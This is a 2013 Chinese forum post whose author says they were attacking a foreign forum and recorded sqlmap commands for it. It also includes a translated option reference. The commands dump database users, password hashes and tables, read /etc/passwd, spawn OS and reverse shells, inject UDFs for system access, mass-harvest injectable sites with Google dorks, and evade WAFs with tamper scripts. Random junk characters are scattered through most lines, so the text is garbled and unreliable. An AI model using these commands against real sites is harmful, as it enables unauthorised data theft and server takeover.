今天搞国外的一个论坛。发现萝卜和穿山甲都无法正常注入,实在没办法了 还是临时学习了下国外的神器sqlmap的使用方法,,直接做个记录、、5 G$ T \: z8 r) r9 ~% A
sqlmap -u “http://url/news?id=1″ –current-user #获取当前用户名称sqlmap -u “http://www.xxoo.com/news?id=1″ –current-db #获取当前数 据库名称
3 e' @1 Y0 i+ Q+ d' e& E4 r0 ssqlmap -u “http://www.xxoo.com/news?id=1″ –tables -D “db_name”#列 表名
+ P8 Q; z+ ~4 C2 ^) psqlmap -u “http://url/news?id=1″ –columns -T “tablename”users-D “db_name”-v 0 #列字段
+ ~$ T/ ~; i; [( Y c
9 T6 w. p: ~/ D6 ssqlmap -u “http://url/news?id=1″ –dump -C “column_name” -T “table_name”-D “db_name”-v
& U( @6 K1 {# F( U/ f4 Z8 h& l' N0 #获取字段内容
( ]: O! U; T0 n/ c- t/ d: r5 e
$ g, x5 V2 @! t1 Z******************信息获取******************- V, j- _2 v9 H( Y
sqlmap -u “http://url/news?id=1″ –dbms “Mysql” –users # dbms 指定数 据库类型
# q; L8 {' u9 ^( q) ?sqlmap -u “http://url/news?id=1″ –users #列数据库用户
# r0 k _% X9 v% @0 O4 w; h, S. d {sqlmap -u “http://url/news?id=1″ –dbs#列数据库
% ?# w' M/ ~* _sqlmap -u “http://url/news?id=1″ –passwords #数据库用户密码; ?+ x# g' o& M
sqlmap -u “http://url/news?id=1″ –passwords-U root -v 0 #列出指定用户 数据库密码' V) ^$ {& [' ]' \* }; s; {1 v7 ~
sqlmap -u “http://url/news?id=1″ –dump -C “password,user,id” -T “tablename”-D “db_name”
/ }( y9 _4 b; x+ z, s1 w0 a–start 1 –stop 20 #列出指定字段,列出20 条
/ L/ b0 k) k" C$ @sqlmap -u “http://url/news?id=1″ –dump-all -v 0 #列出所有数据库所有表& b8 ]% r6 J' H7 G7 P& p
sqlmap -u “http://url/news?id=1″ –privileges #查看权限
9 d' U9 a$ p0 H: g% Tsqlmap -u “http://url/news?id=1″ –privileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ –roles #枚举数据库用户角色8 n+ _' p Y9 f
sqlmap -u “http://url/news?id=1″ –udf-inject #导入用户自定义函数(获取 系统权限!)9 u. K2 O7 N+ ]- j
sqlmap -u “http://url/news?id=1″ –dump-all –exclude-sysdbs -v 0 #列 出当前库所有表/ x2 x; A# o8 B1 ]# P6 v7 Z5 F! \
sqlmap -u “http://url/news?id=1″ –union-cols #union 查询表记录+ U6 z/ U* o+ A+ ]
sqlmap -u “http://url/news?id=1″ –cookie “COOKIE_VALUE”#cookie注入% }; d2 [! J# M/ d, z, N8 X) P7 U6 J
sqlmap -u “http://url/news?id=1″-b #获取banner信息) J/ @5 V% _6 y3 V
sqlmap -u “http://url/news?id=1″ –data “id=3″#post注入2 B% e }- v# b
sqlmap -u “http://url/news?id=1″-v 1 -f #指纹判别数据库类型' x" A( A( _# G+ n) `
sqlmap -u “http://url/news?id=1″ –proxy“http://127.0.0.1:8118” #代理注 入4 V- l' e4 y/ h1 y8 _
sqlmap -u “http://url/news?id=1″–string”STRING_ON_TRUE_PAGE”# 指 定关键词; Z( v+ {4 K+ N
sqlmap -u “http://url/news?id=1″ –sql-shell #执行指定sql命令
. _" G6 f m" C% i8 H0 Y- y' w- F& S) ksqlmap -u “http://url/news?id=1″ –file /etc/passwd
) m! ]1 u) s/ z3 G: vsqlmap -u “http://url/news?id=1″ –os-cmd=whoami #执行系统命令
# ?- t' |% U8 G& }1 p& esqlmap -u “http://url/news?id=1″ –os-shell #系统交互shell sqlmap -u “http://url/news?id=1″ –os-pwn #反弹shell5 f$ ~* ?( O0 c E8 s( L
sqlmap -u “http://url/news?id=1″ –reg-read #读取win系统注册表
6 ?+ J* `1 z; s4 s L. K' Gsqlmap -u “http://url/news?id=1″ –dbs-o “sqlmap.log”#保存进度
% |* F" k! X8 h, B: h% Vsqlmap -u “http://url/news?id=1″ –dbs -o “sqlmap.log” –resume #恢复 已保存进度
x+ ?' S, ]" @# b! {7 ?***********高级用法*************
* V7 H( y* u1 r# O, P& w2 s& }-p name 多个参数如index.php?n_id=1&name=2&data=2020 我们想指定name参数进行注入' y+ ?) x5 w- Z# F
sqlmap -g “google语法” –dump-all –batch #google搜索注入点自动 跑出 所有字段 需保证google.com能正常访问2 P5 g8 s8 ` M+ E1 z$ h4 y4 z
–technique 测试指定注入类型\使用的技术2 S3 n' d2 g1 i; Y3 J- j8 R/ h
不加参数默认测试所有注入技术# `! W) S/ t" \- n
• B: 基于布尔的SQL 盲注
9 Z& `) z% e8 \( D( b# r" S B• E: 基于显错sql 注入( `5 {; e# n! E" G D+ E
• U: 基于UNION 注入, e& H+ A7 v+ j. p( k; M
• S: 叠层sql 注入
' o7 ]" _0 P: ^! b9 O$ r• T: 基于时间盲注
$ S' q! `( S6 T k0 c K. _, ]–tamper 通过编码绕过WEB 防火墙(WAF)Sqlmap 默认用char()5 u' a# {4 ?3 ~4 H' o9 y
–tamper 插件所在目录2 Y9 e Y; W& w! O v6 F: A
\sqlmap-dev\tamper6 p$ {) }7 S! C% D5 D
sqlmap -u “http:// www.2cto.com /news?id=1″ –smart –level 3 –users # smart 智 能
W) W7 h, k% e" P! t1 w+ Nlevel 执行测试等级 攻击实例:
9 g2 I7 [4 x7 ]+ K% cSqlmap -u “http://url/news?id=1&Submit=Submit”
- o. n5 ?( A X% j; w+ x–cookie=”PHPSESSID=41aa833e6d0d3 J0 }2 d7 C2 y8 k2 q& f; y. k# `
28f489ff1ab5a7531406″ –string=”Surname” –dbms=mysql –user
; _( g4 U: Y9 f–password
: }% n6 c3 a1 s参考文档:http://sqlmap.sourceforge.net/doc/README.html
/ @( T$ E2 N# U% b4 q. A***********安装最新版本*************" C; V; C* z' e% d9 x
ubuntu 通过apt-get install 安装的sqlmap版本为0.6 我们通过svn 来安装 为 最新1.0版0 P" I/ f0 v: D. R
sudo svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev. g: v, c+ b" n
安装的位置为:/home/当前用户/sqlmap-dev/sqlmap.py 直接执行/home/当前用户/sqlmap-dev/sqlmap.py –version 这样很不方便 我们可以设置.bashrc 文件
, Y+ ]1 H5 f8 J0 Asudo vim /home/当前用户/.bashrc! T- O% Y, y! U3 |: B# Y# a
#任意位置加上:
; v& H4 U1 s, a: r0 C# @alias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 该环境变量只对当前用户有效0 Q; b# N5 w! G
如果想对所有用户有效 可设置全局 编辑下面的文件8 V7 H* H7 s0 \0 ~% I* I6 l6 O+ V
vim /etc/profile
4 r+ b/ o( @( F; E$ _0 R4 B同样加上:
4 X: ~4 a" K, A) T" N6 h4 ]alias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 重启生效% t6 {3 {: J. y4 {
******************windows 7 (x64) sqlmap install (SVN)************% A. c9 [. F! c3 ]1 z, z' {
http://www.python.org/getit/ 安装python7 z; H5 o: w+ _3 ]! n. q
http://www.sliksvn.com/en/download 安装windows svn client, F2 O0 h1 u" \# i" `, X
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev: ?4 F* h# B- m6 F
安装sqlmap
+ V/ u7 b, B2 U* J, n& j, ^0 ?*修改环境变量/ A d1 {6 `% b e& V3 z$ {
–version 显示程序的版本号并退出
, e3 n' N& H: E: y! @/ e-h, –help 显示此帮助消息并退出
2 Q9 G6 @2 T. a-v VERBOSE 详细级别:0-6(默认为1)/ f( e* j7 R# j1 d5 T
Target(目标): 以下至少需要设置其中一个选项,设置目标URL。
" m4 P+ k! m3 M0 V2 J' E; |-d DIRECT 直接连接到数据库。! V j" L% H+ R' f" m% A; N8 v
-u URL, –url=URL 目标URL。8 n/ T2 K, b" T5 Q2 ?- v
-l LIST 从Burp 或WebScarab 代理的日志中解析目标。
8 F+ j8 ^8 A1 l: M" S/ u8 ~4 @-r REQUESTFILE 从一个文件中载入HTTP 请求。# z) r# U( E- I* Q$ e1 v
-g GOOGLEDORK 处理Google dork 的结果作为目标URL。
1 H' i: y& Y5 k! v9 Q2 U- }-c CONFIGFILE 从INI 配置文件中加载选项。! g" `6 }5 C5 E. z) Y
Request(请求)::
! R/ [/ i/ X$ o8 i; G/ p这些选项可以用来指定如何连接到目标URL。
. t y( Q5 A5 e+ F5 t: n% m–data=DATA 通过POST 发送的数据字符串
1 \ l; K3 |+ }4 w% g) @) a–cookie=COOKIE HTTP Cookie 头" z" r/ d& x( t+ T$ E* o
–cookie-urlencode URL 编码生成的cookie 注入
7 B0 q0 h3 J! \2 i* U–drop-set-cookie 忽略响应的Set –Cookie 头信息
# f! P% F% N' V( |) j
2 i6 g2 B$ b0 n7 u$ @–user-agent=AGENT 指定 HTTP User –Agent 头
8 F1 M) l) h6 ?9 a–random-agent 使用随机选定的HTTP User –Agent 头4 ]! J/ |& \. C9 O+ Q( X: k& J7 r
–referer=REFERER 指定 HTTP Referer 头* b7 r/ J* _$ @6 j# f1 |
–headers=HEADERS 换行分开,加入其他的HTTP 头
) W1 B0 M @2 d) L. Z6 |1 D–auth-type=ATYPE HTTP 身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)/ K& c: c& P( R1 I9 G
–auth-cred=ACRED HTTP 身份验证凭据(用户名:密码)1 n& ?. t1 M- a3 _
–auth-cert=ACERT HTTP 认证证书(key_file,cert_file)' ^7 }( b; n" [/ _: U
–proxy=PROXY 使用HTTP 代理连接到目标URL
& ?9 E$ x: d: J& N) y–proxy-cred=PCRED HTTP 代理身份验证凭据(用户名:密码)1 z, }* M. z5 z$ M z0 Z+ c2 ]
–ignore-proxy 忽略系统默认的HTTP 代理
" L; {0 ~! Y5 B- W! g7 M/ [2 N–delay=DELAY 在每个HTTP 请求之间的延迟时间,单位为秒
! g8 \7 |6 y% m5 M7 P% H–timeout=TIMEOUT 等待连接超时的时间(默认为30 秒)
1 F" v7 F( g U+ v–retries=RETRIES 连接超时后重新连接的时间(默认3)
0 S$ j0 ]8 q( p' K9 ]4 |–scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式
$ J1 T: Y8 q7 ?8 d: H–safe-url=SAFURL 在测试过程中经常访问的url 地址% K4 t: w- J$ x/ L6 s8 |
–safe-freq=SAFREQ 两次访问之间测试请求,给出安全的URL
, x/ p. u4 U% O" w) }Optimization(优化): 这些选项可用于优化SqlMap 的性能。, Z1 q4 ]# \9 _3 m
-o 开启所有优化开关5 G6 o% ~- ~8 _/ z0 ?* C( Z! Q
–predict-output 预测常见的查询输出
! P: N7 p1 h- P8 [–keep-alive 使用持久的HTTP(S)连接& d: |2 I. z! _8 |6 G3 U0 k% ?- v
–null-connection 从没有实际的HTTP 响应体中检索页面长度& b+ u3 ^( \7 Z8 f: t
–threads=THREADS 最大的HTTP(S)请求并发量(默认为1)- s" T0 I2 ^* R7 k& t4 L/ |
Injection(注入):0 {! F% n i9 T& s8 s @
这些选项可以用来指定测试哪些参数, 提供自定义的注入payloads 和可选篡改脚本。
+ X, y& F Z V& Z( @: d7 K. d r-p TESTPARAMETER 可测试的参数(S)8 H8 a6 ?. k* R: F! t
–dbms=DBMS 强制后端的DBMS 为此值
6 w/ {$ B# s4 w' T9 \- t–os=OS 强制后端的DBMS 操作系统为这个值* ~8 [/ R" O" j( p4 L
–prefix=PREFIX 注入payload 字符串前缀
( w* T* L$ l4 [# T' ]) |( Q! m7 z–suffix=SUFFIX 注入 payload 字符串后缀4 N8 K8 E- E$ r
–tamper=TAMPER 使用给定的脚本(S)篡改注入数据 E! [) Z7 L' k4 |$ g. ~0 A
Detection(检测):
) V0 ?5 l+ `9 |$ e5 v4 w! Z这些选项可以用来指定在SQL 盲注时如何解析和比较HTTP 响应页面的内容。, K" E' Y1 u1 G6 v; m; n
–level=LEVEL 执行测试的等级(1-5,默认为1) q0 y2 t1 E6 w1 B# c3 G
–risk=RISK 执行测试的风险(0-3,默认为1)
6 o( e+ k& f h: }) }, M–string=STRING 查询时有效时在页面匹配字符串0 L4 o7 A t6 R
–regexp=REGEXP 查询时有效时在页面匹配正则表达式
2 g5 ~: Q1 g4 M1 Q–text-only 仅基于在文本内容比较网页
# x7 ]) }$ b3 E& p6 A* {0 HTechniques(技巧): 这些选项可用于调整具体的SQL 注入测试。' x7 _+ B# [. U7 ?( h1 O
–technique=TECH SQL 注入技术测试(默认BEUST)" s9 b# s: Z6 a+ w0 i: X
–time-sec=TIMESEC DBMS 响应的延迟时间(默认为5 秒)% z5 p1 e3 C7 }3 y, d
–union-cols=UCOLS 定列范围用于测试UNION 查询注入
4 L, ^1 y# f7 |5 H–union-char=UCHAR 用于暴力猜解列数的字符" {4 F8 w" q5 \3 L
Fingerprint(指纹):
# ]2 t# h2 l% W2 V: F-f, –fingerprint 执行检查广泛的DBMS 版本指纹
. ]8 E0 K9 e* l9 x: T; p5 BEnumeration(枚举):
" G. [5 t$ P+ x( e
, N( I; j: c; K$ ?! D这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己 的SQL 语句。
* u- F* Y- x3 W) W# e-b, –banner 检索数据库管理系统的标识' o4 V$ O s5 N# a6 l- o8 l* S
–current-user 检索数据库管理系统当前用户& i) n+ ?! H! X$ ? y
–current-db 检索数据库管理系统当前数据库4 D: f% N) q" p$ t7 c% h
–is-dba 检测DBMS 当前用户是否DBA
]; G* b6 n1 g9 ^' K3 Y( E1 C2 L–users 枚举数据库管理系统用户; H6 Y2 x0 V& E0 ?- W3 a1 s4 A* Q
–passwords 枚举数据库管理系统用户密码哈希
) |) x/ ^, _- h q' n–privileges 枚举数据库管理系统用户的权限( J- |2 l3 W' A9 G: r C' b5 ]7 M2 e
–roles 枚举数据库管理系统用户的角色1 l% }" \: a9 |: Z# b2 t' M
–dbs 枚举数据库管理系统数据库
4 A: V9 Z- k. v: u+ J; E. b–tables 枚举的DBMS 数据库中的表
: Y9 E% D) A( a–columns 枚举DBMS 数据库表列7 s1 M# T, f5 d& x2 A
–dump 转储数据库管理系统的数据库中的表项2 Q$ e0 u; E. c. f. \( Q l( X
–dump-all 转储所有的DBMS 数据库表中的条目9 t& M/ D+ W/ E" ]$ D0 A
–search 搜索列(S),表(S)和/或数据库名称(S)
) B+ o; P$ k5 a9 ?6 O-D DB 要进行枚举的数据库名6 g- s1 _2 S$ Q
-T TBL 要进行枚举的数据库表/ q2 x) t u' I2 W" |
-C COL 要进行枚举的数据库列
, R: Q8 D) X4 k3 C+ z. V7 o9 I2 d+ s-U USER 用来进行枚举的数据库用户
; b5 s1 i% h9 X. p* O# k$ f0 G+ [–exclude-sysdbs 枚举表时排除系统数据库, ~- H3 {+ s, |2 ~$ @+ ?
–start=LIMITSTART 第一个查询输出进入检索9 B2 S$ m4 z# @0 b+ e3 o) e- J
–stop=LIMITSTOP 最后查询的输出进入检索: Z4 o) A# Q6 u) O! H
–first=FIRSTCHAR 第一个查询输出字的字符检索
. D6 a+ q% W/ Q& K% c I–last=LASTCHAR 最后查询的输出字字符检索" p. u o/ a" A. \& n
–sql-query=QUERY 要执行的SQL 语句
1 a; Z" q# @2 o# j5 d. k–sql-shell 提示交互式SQL 的shell3 m& Y {/ W8 f C/ \
Brute force(蛮力): 这些选项可以被用来运行蛮力检查。6 f% L1 _2 b6 D- N
–common-tables 检查存在共同表& D' A: o+ [' K2 ~& }
–common-columns 检查存在共同列
! i! P2 x2 H+ `4 M- y( MUser-defined function injection(用户自定义函数注入): 这些选项可以用来创建用户自定义函数。8 ~! E" d: B( g& X
–udf-inject 注入用户自定义函数
3 A1 E$ k( o" w+ {8 q( r–shared-lib=SHLIB 共享库的本地路径) z& N- K% i1 c" T0 L
File system access(访问文件系统): 这些选项可以被用来访问后端数据库管理系统的底层文件系统。) {+ E- e' f l$ o6 }
–file-read=RFILE 从后端的数据库管理系统文件系统读取文件
( [+ q5 V1 v' s/ S% N–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件
" |- V* z7 p" H# K: r" J1 K7 B–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径
, w; @9 Y9 l$ m. XOperating system access(操作系统访问): 这些选项可以用于访问后端数据库管理系统的底层操作系统。; d" O, Q% o& ?2 X% B7 C. D
–os-cmd=OSCMD 执行操作系统命令( x% ]1 E5 ], Y
–os-shell 交互式的操作系统的shell. y- U! x4 P& k( m) j
–os-pwn 获取一个OOB shell,meterpreter 或VNC
9 L' j, }! @& q6 b' M–os-smbrelay 一键获取一个OOB shell,meterpreter 或VNC
( y+ K% V5 F* V–os-bof 存储过程缓冲区溢出利用
' ]2 n7 b3 S7 c' |–priv-esc 数据库进程用户权限提升9 R1 u8 V/ k, B/ f! L& h
–msf-path=MSFPATH Metasploit Framework 本地的安装路径
" [- K: `" g9 {- b# A–tmp-path=TMPPATH 远程临时文件目录的绝对路径
) A" a5 b0 |' [+ g& T. u# x' `5 w " p' m6 B. L: I4 _( W
Windows 注册表访问: 这些选项可以被用来访问后端数据库管理系统Windows 注册表。
; E& t% ^3 Z7 O" v) [–reg-read 读一个Windows 注册表项值
3 f7 R5 k' P: n; y* y1 M5 o–reg-add 写一个Windows 注册表项值数据1 h0 t: J& E; e1 I- ?
–reg-del 删除Windows 注册表键值
3 I! J5 ~$ W1 P$ S) N9 r–reg-key=REGKEY Windows 注册表键4 g. r/ u& J' _& C1 m9 X
–reg-value=REGVAL Windows 注册表项值
, y3 @1 w5 A3 J I' D3 i R0 @# _3 J' b–reg-data=REGDATA Windows 注册表键值数据
; C6 i7 i: z2 ?% w; a+ h5 w5 W–reg-type=REGTYPE Windows 注册表项值类型8 D7 f- T3 C8 w, ]
General(一般): 这些选项可以用来设置一些一般的工作参数。4 _$ d: Q8 [* ~
-t TRAFFICFILE 记录所有HTTP 流量到一个文本文件中
% R( G! S) x" O-s SESSIONFILE 保存和恢复检索会话文件的所有数据+ h* v7 b% C& ?- |8 ~
–flush-session 刷新当前目标的会话文件: a; X$ T f9 V6 K* c" ~
–fresh-queries 忽略在会话文件中存储的查询结果( t' J8 I6 ?8 ?4 ~2 b
–eta 显示每个输出的预计到达时间
# w1 v; p# ^7 h4 v: b–update 更新SqlMap
# V+ g/ j' U6 `) s–save file 保存选项到INI 配置文件2 n* A3 h% g* T' t
–batch 从不询问用户输入,使用所有默认配置。
0 S* N' }# f; [# ~" z+ J* @Miscellaneous(杂项):
% ~- T" B4 u' p) ]–beep 发现SQL 注入时提醒
6 o* G" z2 `( c2 d& e& ~+ m$ N–check-payload IDS 对注入payloads 的检测测试
# n2 T, b# X) z) Z; B–cleanup SqlMap 具体的UDF 和表清理DBMS& T/ h9 o& F) ~ N
–forms 对目标URL 的解析和测试形式4 ]7 {, o" g7 y7 p0 Z" b
–gpage=GOOGLEPAGE 从指定的页码使用谷歌dork 结果
* |* x3 O3 Q8 o9 K5 j8 i–page-rank Google dork 结果显示网页排名(PR)2 c. ^; m& b. ^6 r) t# K& n
–parse-errors 从响应页面解析数据库管理系统的错误消息
3 S5 ^5 j9 G* ~: @! J–replicate 复制转储的数据到一个sqlite3 数据库2 q% w2 E. j8 ?- M0 X" w4 E+ m6 J9 @
–tor 使用默认的Tor(Vidalia/ Privoxy/ Polipo)代理地址
( |9 C6 J4 ?. d" A–wizard 给初级用户的简单向导界面 |
发表于 2013-4-4 22:26:32
收藏
支持
反对